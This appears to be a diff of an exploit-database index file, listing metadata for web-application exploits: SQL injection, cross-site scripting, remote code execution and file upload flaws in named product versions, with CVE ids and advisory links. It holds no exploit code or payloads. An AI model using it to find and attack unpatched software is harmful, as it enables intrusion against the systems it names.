41881,exploits/multiple/webapps/41881.html,"agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery",2017-04-13,"SySS GmbH",webapps,multiple,,2017-04-13,2017-04-13,0,,"Cross-Site Request Forgery (CSRF)",,,,https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-008.txt 41881,exploits/multiple/webapps/41881.html,"agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery",2017-04-13,"SySS GmbH",webapps,multiple,,2017-04-13,2017-04-13,0,,"Cross-Site Request Forgery (CSRF)",,,,https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-008.txt
41882,exploits/multiple/webapps/41882.html,"agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting",2017-04-13,"SySS GmbH",webapps,multiple,,2017-04-13,2017-04-13,0,,"Cross-Site Scripting (XSS)",,,,https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-005.txt 41882,exploits/multiple/webapps/41882.html,"agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting",2017-04-13,"SySS GmbH",webapps,multiple,,2017-04-13,2017-04-13,0,,"Cross-Site Scripting (XSS)",,,,https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-005.txt
@ -11971,6 +11982,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
32162,exploits/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php?Filename' Remote Code Execution",2014-03-10,Portcullis,webapps,multiple,80,2014-03-10,2016-10-10,1,CVE-2014-2044;OSVDB-104082,,,,,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2044/ 32162,exploits/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php?Filename' Remote Code Execution",2014-03-10,Portcullis,webapps,multiple,80,2014-03-10,2016-10-10,1,CVE-2014-2044;OSVDB-104082,,,,,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2044/
37058,exploits/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,webapps,multiple,8080,2015-05-18,2015-05-18,0,OSVDB-122315;OSVDB-122311;OSVDB-122310,,,,,https://www.vulnerability-lab.com/get_content.php?id=1494 37058,exploits/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,webapps,multiple,8080,2015-05-18,2015-05-18,0,OSVDB-122315;OSVDB-122311;OSVDB-122310,,,,,https://www.vulnerability-lab.com/get_content.php?id=1494
43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5 43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5
51343,exploits/multiple/webapps/51343.txt,"Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-08,omurugur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2022-0020,,,,,
35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt 35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt
50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",2021-10-04,"Yasser Khan",webapps,multiple,,2021-10-04,2021-10-04,0,CVE-2021-41381,,,,, 50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",2021-10-04,"Yasser Khan",webapps,multiple,,2021-10-04,2021-10-04,0,CVE-2021-41381,,,,,
51099,exploits/multiple/webapps/51099.txt,"Pega Platform 8.1.0 - Remote Code Execution (RCE)",2023-03-28,"Marcin Wolak",webapps,multiple,,2023-03-28,2023-03-28,0,CVE-2022-24082,,,,, 51099,exploits/multiple/webapps/51099.txt,"Pega Platform 8.1.0 - Remote Code Execution (RCE)",2023-03-28,"Marcin Wolak",webapps,multiple,,2023-03-28,2023-03-28,0,CVE-2022-24082,,,,,
@ -12086,11 +12098,13 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49832,exploits/multiple/webapps/49832.js,"StudyMD 0.3.2 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,, 49832,exploits/multiple/webapps/49832.js,"StudyMD 0.3.2 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
14101,exploits/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload",2010-06-28,Battousai,webapps,multiple,80,2010-06-28,2010-06-28,1,,,,,, 14101,exploits/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload",2010-06-28,Battousai,webapps,multiple,80,2010-06-28,2010-06-28,1,,,,,,
35214,exploits/multiple/webapps/35214.txt,"Subex Fms 7.4 - SQL Injection",2014-11-11,"Anastasios Monachos",webapps,multiple,,2014-11-17,2014-11-17,0,CVE-2014-8728;OSVDB-110747,,,,, 35214,exploits/multiple/webapps/35214.txt,"Subex Fms 7.4 - SQL Injection",2014-11-11,"Anastasios Monachos",webapps,multiple,,2014-11-17,2014-11-17,0,CVE-2014-8728;OSVDB-110747,,,,,
51340,exploits/multiple/webapps/51340.txt,"Suprema BioStar 2 v2.8.16 - SQL Injection",2023-04-08,"Yuriy (Vander) Tsarenko",webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2023-27167,,,,,
50937,exploits/multiple/webapps/50937.txt,"Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)",2022-05-17,"Pankaj Kumar Thakur",webapps,multiple,,2022-05-17,2022-05-17,0,CVE-2022-29727,,,,, 50937,exploits/multiple/webapps/50937.txt,"Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)",2022-05-17,"Pankaj Kumar Thakur",webapps,multiple,,2022-05-17,2022-05-17,0,CVE-2022-29727,,,,,
37470,exploits/multiple/webapps/37470.txt,"SWFupload - 'movieName' Cross-Site Scripting",2012-06-29,"Nathan Partlan",webapps,multiple,,2012-06-29,2015-07-03,1,CVE-2012-3414;OSVDB-83413,,,,,https://www.securityfocus.com/bid/54245/info 37470,exploits/multiple/webapps/37470.txt,"SWFupload - 'movieName' Cross-Site Scripting",2012-06-29,"Nathan Partlan",webapps,multiple,,2012-06-29,2015-07-03,1,CVE-2012-3414;OSVDB-83413,,,,,https://www.securityfocus.com/bid/54245/info
35908,exploits/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS)",2015-01-26,MindCracker,webapps,multiple,,2015-01-26,2015-01-26,0,OSVDB-117564,,,,, 35908,exploits/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS)",2015-01-26,MindCracker,webapps,multiple,,2015-01-26,2015-01-26,0,OSVDB-117564,,,,,
35915,exploits/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",webapps,multiple,,2015-01-26,2015-01-26,0,CVE-2014-9226;OSVDB-117515;CVE-2014-9225;CVE-2014-9224;CVE-2014-7289;OSVDB-117359;OSVDB-117357;OSVDB-117356;OSVDB-117355,,,,,http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150119_00 35915,exploits/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",webapps,multiple,,2015-01-26,2015-01-26,0,CVE-2014-9226;OSVDB-117515;CVE-2014-9225;CVE-2014-9224;CVE-2014-7289;OSVDB-117359;OSVDB-117357;OSVDB-117356;OSVDB-117355,,,,,http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150119_00
47071,exploits/multiple/webapps/47071.txt,"Symantec DLP 15.5 MP1 - Cross-Site Scripting",2019-07-03,"Chapman Schleiss",webapps,multiple,8443,2019-07-03,2019-07-03,0,CVE-2019-9701,"Cross-Site Scripting (XSS)",,,, 47071,exploits/multiple/webapps/47071.txt,"Symantec DLP 15.5 MP1 - Cross-Site Scripting",2019-07-03,"Chapman Schleiss",webapps,multiple,8443,2019-07-03,2019-07-03,0,CVE-2019-9701,"Cross-Site Scripting (XSS)",,,,
51342,exploits/multiple/webapps/51342.txt,"Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)",2023-04-08,omurugur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2022-25630,,,,,
23109,exploits/multiple/webapps/23109.txt,"Symantec Messaging Gateway 9.5.3-3 - Cross-Site Request Forgery",2012-12-03,"Ben Williams",webapps,multiple,,2012-12-03,2012-12-03,0,CVE-2012-0308;OSVDB-84897,,,,,http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120827_00 23109,exploits/multiple/webapps/23109.txt,"Symantec Messaging Gateway 9.5.3-3 - Cross-Site Request Forgery",2012-12-03,"Ben Williams",webapps,multiple,,2012-12-03,2012-12-03,0,CVE-2012-0308;OSVDB-84897,,,,,http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120827_00
42613,exploits/multiple/webapps/42613.txt,"Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery",2017-08-09,"Dhiraj Mishra",webapps,multiple,,2017-09-04,2017-09-04,1,CVE-2017-6328,,,,, 42613,exploits/multiple/webapps/42613.txt,"Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery",2017-08-09,"Dhiraj Mishra",webapps,multiple,,2017-09-04,2017-09-04,1,CVE-2017-6328,,,,,
41691,exploits/multiple/webapps/41691.rb,"SysAid Help Desk Administrator Portal < 14.4 - Arbitrary File Upload (Metasploit)",2015-06-03,Metasploit,webapps,multiple,,2017-03-23,2017-03-23,1,CVE-2015-2994,,,,,https://github.com/rapid7/metasploit-framework/blob/3123175ac75c38bec5165e01cda05e3b38287003/modules/exploits/multi/http/sysaid_auth_file_upload.rb 41691,exploits/multiple/webapps/41691.rb,"SysAid Help Desk Administrator Portal < 14.4 - Arbitrary File Upload (Metasploit)",2015-06-03,Metasploit,webapps,multiple,,2017-03-23,2017-03-23,1,CVE-2015-2994,,,,,https://github.com/rapid7/metasploit-framework/blob/3123175ac75c38bec5165e01cda05e3b38287003/modules/exploits/multi/http/sysaid_auth_file_upload.rb
@ -16965,6 +16979,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
1869,exploits/php/webapps/1869.php,"DotClear 1.2.4 - 'prepend.php' Remote File Inclusion",2006-06-03,rgod,webapps,php,,2006-06-02,,1,OSVDB-25977;CVE-2006-2866,,,,, 1869,exploits/php/webapps/1869.php,"DotClear 1.2.4 - 'prepend.php' Remote File Inclusion",2006-06-03,rgod,webapps,php,,2006-06-02,,1,OSVDB-25977;CVE-2006-2866,,,,,
29838,exploits/php/webapps/29838.txt,"DotClear 1.2.x - '/ecrire/trackback.php?post_id' Cross-Site Scripting",2007-04-11,nassim,webapps,php,,2007-04-11,2013-11-27,1,CVE-2007-1989;OSVDB-34814,,,,,https://www.securityfocus.com/bid/23411/info 29838,exploits/php/webapps/29838.txt,"DotClear 1.2.x - '/ecrire/trackback.php?post_id' Cross-Site Scripting",2007-04-11,nassim,webapps,php,,2007-04-11,2013-11-27,1,CVE-2007-1989;OSVDB-34814,,,,,https://www.securityfocus.com/bid/23411/info
29839,exploits/php/webapps/29839.txt,"DotClear 1.2.x - '/tools/thememng/index.php?tool_url' Cross-Site Scripting",2007-04-11,nassim,webapps,php,,2007-04-11,2013-11-27,1,CVE-2007-1989;OSVDB-34815,,,,,https://www.securityfocus.com/bid/23411/info 29839,exploits/php/webapps/29839.txt,"DotClear 1.2.x - '/tools/thememng/index.php?tool_url' Cross-Site Scripting",2007-04-11,nassim,webapps,php,,2007-04-11,2013-11-27,1,CVE-2007-1989;OSVDB-34815,,,,,https://www.securityfocus.com/bid/23411/info
51353,exploits/php/webapps/51353.txt,"dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)",2023-04-08,"Mirabbas Ağalarov",webapps,php,,2023-04-08,2023-04-08,0,,,,,,
36888,exploits/php/webapps/36888.html,"Dotclear 2.4.1.2 - '/admin/auth.php?login_data' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",webapps,php,,2012-02-29,2015-05-02,1,CVE-2012-1039;OSVDB-79697,,,,,https://www.securityfocus.com/bid/52221/info 36888,exploits/php/webapps/36888.html,"Dotclear 2.4.1.2 - '/admin/auth.php?login_data' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",webapps,php,,2012-02-29,2015-05-02,1,CVE-2012-1039;OSVDB-79697,,,,,https://www.securityfocus.com/bid/52221/info
36889,exploits/php/webapps/36889.txt,"Dotclear 2.4.1.2 - '/admin/blogs.php?nb' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",webapps,php,,2012-02-29,2015-05-02,1,CVE-2012-1039;OSVDB-79699,,,,,https://www.securityfocus.com/bid/52221/info 36889,exploits/php/webapps/36889.txt,"Dotclear 2.4.1.2 - '/admin/blogs.php?nb' Cross-Site Scripting",2012-02-29,"High-Tech Bridge SA",webapps,php,,2012-02-29,2015-05-02,1,CVE-2012-1039;OSVDB-79699,,,,,https://www.securityfocus.com/bid/52221/info
36890,exploits/php/webapps/36890.txt,"Dotclear 2.4.1.2 - '/admin/comments.php' Multiple Cross-Site Scripting Vulnerabilities",2012-02-29,"High-Tech Bridge SA",webapps,php,,2012-02-29,2015-05-02,1,CVE-2012-1039;OSVDB-79698,,,,,https://www.securityfocus.com/bid/52221/info 36890,exploits/php/webapps/36890.txt,"Dotclear 2.4.1.2 - '/admin/comments.php' Multiple Cross-Site Scripting Vulnerabilities",2012-02-29,"High-Tech Bridge SA",webapps,php,,2012-02-29,2015-05-02,1,CVE-2012-1039;OSVDB-79698,,,,,https://www.securityfocus.com/bid/52221/info
@ -18998,7 +19013,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49628,exploits/php/webapps/49628.txt,"GLPI 9.5.3 - 'fromtype' Unsafe Reflection",2021-03-08,"Vadym Soroka",webapps,php,,2021-03-08,2021-03-08,0,,,,,, 49628,exploits/php/webapps/49628.txt,"GLPI 9.5.3 - 'fromtype' Unsafe Reflection",2021-03-08,"Vadym Soroka",webapps,php,,2021-03-08,2021-03-08,0,,,,,,
51232,exploits/php/webapps/51232.txt,"GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-34125,,,,, 51232,exploits/php/webapps/51232.txt,"GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-34125,,,,,
51230,exploits/php/webapps/51230.txt,"GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31062,,,,, 51230,exploits/php/webapps/51230.txt,"GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31062,,,,,
51231,exploits/php/webapps/51231.txt,"GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31068,,,,,
51233,exploits/php/webapps/51233.txt,"GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31056,,,,, 51233,exploits/php/webapps/51233.txt,"GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31056,,,,,
34758,exploits/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Directory Traversal Local File Inclusion",2014-09-24,Securify,webapps,php,80,2014-09-24,2014-09-24,0,OSVDB-111920;OSVDB-111919,,,,,http://www.securify.nl/advisory/SFY20140901/glype_proxy_cookie_jar_path_traversal_allows_code_execution.html 34758,exploits/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Directory Traversal Local File Inclusion",2014-09-24,Securify,webapps,php,80,2014-09-24,2014-09-24,0,OSVDB-111920;OSVDB-111919,,,,,http://www.securify.nl/advisory/SFY20140901/glype_proxy_cookie_jar_path_traversal_allows_code_execution.html
34759,exploits/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,webapps,php,80,2014-09-24,2014-09-24,0,OSVDB-111921,,,,,http://www.securify.nl/advisory/SFY20140902/glype_proxy_local_address_filter_bypass.html 34759,exploits/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,webapps,php,80,2014-09-24,2014-09-24,0,OSVDB-111921,,,,,http://www.securify.nl/advisory/SFY20140902/glype_proxy_local_address_filter_bypass.html
@ -19576,6 +19590,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42682,exploits/php/webapps/42682.txt,"ICGrocery 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,, 42682,exploits/php/webapps/42682.txt,"ICGrocery 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,,
42688,exploits/php/webapps/42688.txt,"ICHelpDesk 1.1 - 'pk' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,, 42688,exploits/php/webapps/42688.txt,"ICHelpDesk 1.1 - 'pk' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,,
42669,exploits/php/webapps/42669.txt,"ICHotelReservation 3.3 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,, 42669,exploits/php/webapps/42669.txt,"ICHotelReservation 3.3 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,,
51329,exploits/php/webapps/51329.py,"Icinga Web 2.10 - Arbitrary File Disclosure",2023-04-08,"Jacob Ebben",webapps,php,,2023-04-08,2023-04-08,0,CVE-2022-24716,,,,,
42679,exploits/php/webapps/42679.txt,"ICJewelry 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,, 42679,exploits/php/webapps/42679.txt,"ICJewelry 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,,
35547,exploits/php/webapps/35547.txt,"ICJobSite 1.1 - 'pid' SQL Injection",2011-03-30,RoAd_KiLlEr,webapps,php,,2011-03-30,2014-12-16,1,CVE-2011-1557;OSVDB-73408,,,,,https://www.securityfocus.com/bid/47100/info 35547,exploits/php/webapps/35547.txt,"ICJobSite 1.1 - 'pid' SQL Injection",2011-03-30,RoAd_KiLlEr,webapps,php,,2011-03-30,2014-12-16,1,CVE-2011-1557;OSVDB-73408,,,,,https://www.securityfocus.com/bid/47100/info
42667,exploits/php/webapps/42667.txt,"ICLowBidAuction 3.3 - SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,, 42667,exploits/php/webapps/42667.txt,"ICLowBidAuction 3.3 - SQL Injection",2017-09-13,"Ihsan Sencan",webapps,php,,2017-09-13,2017-09-13,0,,,,,,
@ -21771,6 +21786,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
16906,exploits/php/webapps/16906.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,webapps,php,,2010-06-15,2016-11-04,1,OSVDB-64578,"Metasploit Framework (MSF)",,,, 16906,exploits/php/webapps/16906.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,webapps,php,,2010-06-15,2016-11-04,1,OSVDB-64578,"Metasploit Framework (MSF)",,,,
9926,exploits/php/webapps/9926.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Execution",2009-07-22,spinbad,webapps,php,,2009-07-21,,1,OSVDB-64578;CVE-2011-4908,,,,, 9926,exploits/php/webapps/9926.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Execution",2009-07-22,spinbad,webapps,php,,2009-07-21,,1,OSVDB-64578;CVE-2011-4908,,,,,
48518,exploits/php/webapps/48518.txt,"Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)",2020-05-26,"Mehmet Kelepçe",webapps,php,,2020-05-26,2020-05-26,0,,,,,, 48518,exploits/php/webapps/48518.txt,"Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)",2020-05-26,"Mehmet Kelepçe",webapps,php,,2020-05-26,2020-05-26,0,,,,,,
51334,exploits/php/webapps/51334.py,"Joomla! v4.2.8 - Unauthenticated information disclosure",2023-04-08,"Alexandre ZANNI",webapps,php,,2023-04-08,2023-04-08,0,CVE-2023-23752,,,,,
37714,exploits/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,webapps,php,80,2015-08-08,2015-08-08,1,OSVDB-126309,,,,, 37714,exploits/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,webapps,php,80,2015-08-08,2015-08-08,1,OSVDB-126309,,,,,
35667,exploits/php/webapps/35667.txt,"Joostina (Multiple Components) - SQL Injection",2011-04-27,KedAns-Dz,webapps,php,,2011-04-27,2015-01-01,1,,,,,,https://www.securityfocus.com/bid/47595/info 35667,exploits/php/webapps/35667.txt,"Joostina (Multiple Components) - SQL Injection",2011-04-27,KedAns-Dz,webapps,php,,2011-04-27,2015-01-01,1,,,,,,https://www.securityfocus.com/bid/47595/info
35187,exploits/php/webapps/35187.txt,"Joostina 1.3 - 'index.php' Cross-Site Scripting",2011-01-08,MustLive,webapps,php,,2011-01-08,2014-11-07,1,,,,,,https://www.securityfocus.com/bid/45732/info 35187,exploits/php/webapps/35187.txt,"Joostina 1.3 - 'index.php' Cross-Site Scripting",2011-01-08,MustLive,webapps,php,,2011-01-08,2014-11-07,1,,,,,,https://www.securityfocus.com/bid/45732/info
@ -22974,6 +22990,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49138,exploits/php/webapps/49138.txt,"Medical Center Portal Management System 1.0 - 'login' SQL Injection",2020-12-01,"Aydın Baran Ertemir",webapps,php,,2020-12-01,2020-12-01,0,,,,,, 49138,exploits/php/webapps/49138.txt,"Medical Center Portal Management System 1.0 - 'login' SQL Injection",2020-12-01,"Aydın Baran Ertemir",webapps,php,,2020-12-01,2020-12-01,0,,,,,,
49236,exploits/php/webapps/49236.txt,"Medical Center Portal Management System 1.0 - Multiple Stored XSS",2020-12-11,"Saeed Bala Ahmed",webapps,php,,2020-12-11,2020-12-11,0,,,,,, 49236,exploits/php/webapps/49236.txt,"Medical Center Portal Management System 1.0 - Multiple Stored XSS",2020-12-11,"Saeed Bala Ahmed",webapps,php,,2020-12-11,2020-12-11,0,,,,,,
41091,exploits/php/webapps/41091.txt,"Medical Clinic Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php,,2017-01-18,2017-01-18,0,,,,,, 41091,exploits/php/webapps/41091.txt,"Medical Clinic Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php,,2017-01-18,2017-01-18,0,,,,,,
51338,exploits/php/webapps/51338.txt,"Medicine Tracker System v1.0 - Sql Injection",2023-04-08,"Sanjay Singh",webapps,php,,2023-04-08,2023-04-08,0,,,,,,
18202,exploits/php/webapps/18202.txt,"Meditate Web Content Editor 'username_input' - SQL Injection",2011-12-05,"Stefan Schurtz",webapps,php,,2011-12-05,2011-12-05,0,OSVDB-77491,,,,,http://secunia.com/advisories/47010/ 18202,exploits/php/webapps/18202.txt,"Meditate Web Content Editor 'username_input' - SQL Injection",2011-12-05,"Stefan Schurtz",webapps,php,,2011-12-05,2011-12-05,0,OSVDB-77491,,,,,http://secunia.com/advisories/47010/
46592,exploits/php/webapps/46592.txt,"Meeplace Business Review Script - 'id' SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80,2019-03-22,2019-03-22,0,,"SQL Injection (SQLi)",,,, 46592,exploits/php/webapps/46592.txt,"Meeplace Business Review Script - 'id' SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80,2019-03-22,2019-03-22,0,,"SQL Injection (SQLi)",,,,
32232,exploits/php/webapps/32232.txt,"Meet#Web 0.8 - 'ManagerResource.class.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",webapps,php,,2008-08-13,2014-03-13,1,CVE-2008-6066;OSVDB-51773,,,,,https://www.securityfocus.com/bid/30673/info 32232,exploits/php/webapps/32232.txt,"Meet#Web 0.8 - 'ManagerResource.class.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",webapps,php,,2008-08-13,2014-03-13,1,CVE-2008-6066;OSVDB-51773,,,,,https://www.securityfocus.com/bid/30673/info
@ -24502,6 +24519,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48444,exploits/php/webapps/48444.txt,"Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection",2020-05-11,"Tarun Sehgal",webapps,php,,2020-05-11,2020-05-11,0,,,,,, 48444,exploits/php/webapps/48444.txt,"Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection",2020-05-11,"Tarun Sehgal",webapps,php,,2020-05-11,2020-05-11,0,,,,,,
39167,exploits/php/webapps/39167.txt,"Online Airline Booking System - Multiple Vulnerabilities",2016-01-05,"Manish Tanwar",webapps,php,80,2016-01-05,2016-01-05,0,OSVDB-132611;OSVDB-132610,,,,http://www.exploit-db.comOABSv1.7.zip, 39167,exploits/php/webapps/39167.txt,"Online Airline Booking System - Multiple Vulnerabilities",2016-01-05,"Manish Tanwar",webapps,php,80,2016-01-05,2016-01-05,0,OSVDB-132611;OSVDB-132610,,,,http://www.exploit-db.comOABSv1.7.zip,
47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php,80,2019-09-09,2019-09-10,0,,"SQL Injection (SQLi)",,,, 47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php,80,2019-09-09,2019-09-10,0,,"SQL Injection (SQLi)",,,,
51337,exploits/php/webapps/51337.txt,"Online Appointment System V1.0 - Cross-Site Scripting (XSS)",2023-04-08,"Sanjay Singh",webapps,php,,2023-04-08,2023-04-08,0,,,,,,
50089,exploits/php/webapps/50089.txt,"Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-07-05,"Subhadip Nag",webapps,php,,2021-07-05,2021-07-05,0,,,,,, 50089,exploits/php/webapps/50089.txt,"Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-07-05,"Subhadip Nag",webapps,php,,2021-07-05,2021-07-05,0,,,,,,
47922,exploits/php/webapps/47922.txt,"Online Book Store 1.0 - 'bookisbn' SQL Injection",2020-01-15,"Ertebat Gostar Co",webapps,php,,2020-01-15,2020-01-15,0,,,,,, 47922,exploits/php/webapps/47922.txt,"Online Book Store 1.0 - 'bookisbn' SQL Injection",2020-01-15,"Ertebat Gostar Co",webapps,php,,2020-01-15,2020-01-15,0,,,,,,
48775,exploits/php/webapps/48775.txt,"Online Book Store 1.0 - 'id' SQL Injection",2020-08-31,"Moaaz Taha",webapps,php,,2020-08-31,2020-08-31,0,,,,,, 48775,exploits/php/webapps/48775.txt,"Online Book Store 1.0 - 'id' SQL Injection",2020-08-31,"Moaaz Taha",webapps,php,,2020-08-31,2020-08-31,0,,,,,,
@ -24670,6 +24688,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
